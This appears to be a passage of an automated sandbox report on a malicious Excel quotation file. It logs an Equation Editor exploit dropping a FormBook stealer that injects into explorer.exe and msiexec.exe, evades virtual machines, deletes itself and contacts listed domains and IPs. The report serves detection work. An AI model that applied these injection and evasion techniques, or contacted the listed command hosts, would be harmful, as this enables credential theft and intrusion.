            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710078 NtResumeThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710060 NtQuerySection,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027110D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711148 NtOpenThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027101D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FAD0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FAB8 NtQueryValueKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F938 NtWriteFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000A9D50 NtCreateFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000A9E00 NtReadFile,
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000A9E80 NtClose,
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
            Source: rundll32[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: (QUOTATION)B-RUS-20061REV2.xlsxReversingLabs: Detection: 28%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD74B.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/10@2/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe
            Source: C:\Users\Public\vbc.exeCode function: 4_2_01007C03 push es; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA5CE0 push 8A4000C4h; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA5C89 push 8A3400C4h; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA5C30 push 898C00C4h; ret
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA3BB0 push es; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004178AB pushfd ; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0040E27F push edx; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409BD5 push esp; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004175F8 push edx; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419DA2 pushad ; retf
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041660F push edx; iretd
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEF2 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEFB push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEA5 push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF5C push eax; ret
            Source: C:\Users\Public\vbc.exeCode function: 5_2_01007C03 push es; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271DFA1 push ecx; ret
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0009E27F push edx; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.61448564553
            Source: initial sampleStatic PE information: section name: .text entropy: 7.61448564553
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEB
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 4.2.vbc.exe.25b91f4.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2796, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184Thread sleep time: -180000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2752Thread sleep time: -32547s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 1164Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1724Thread sleep time: -45000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A80 rdtsc
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 32547
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0V
            Source: explorer.exe, 00000006.00000000.483720913.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000006.00000000.479521551.00000000045CF000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmpBinary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________q_
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A80 rdtsc
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A526F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027226F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0040ACC0 LdrLoadDll,
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.paradisgrp.com
            Source: C:\Windows\explorer.exeNetwork Connect: 128.65.195.232 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.uvoyus.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: A30000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
            Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 491355 Sample: (QUOTATION)B-RUS-20061REV2.xlsx Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 21 2->15         started        process3 dnsIp4 46 180.214.239.85, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->46 34 C:\Users\user\AppData\...\rundll32[1].exe, PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        38 C:\...\~$(QUOTATION)B-RUS-20061REV2.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 48 Multi AV Scanner detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 52 Injects a PE file into a foreign processes 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 40 www.paradisgrp.com 128.65.195.232, 49166, 80 INFOMANIAK-ASCH Switzerland 23->40 42 www.uvoyus.com 23->42 44 uvoyus.com 34.102.136.180, 49167, 80 GOOGLEUS United States 23->44 70 System process connects to network (likely due to code injection or exploit) 23->70 27 msiexec.exe 23->27         started        30 autofmt.exe 23->30         started        signatures13 process14 signatures15 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 32 cmd.exe 27->32         started        process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

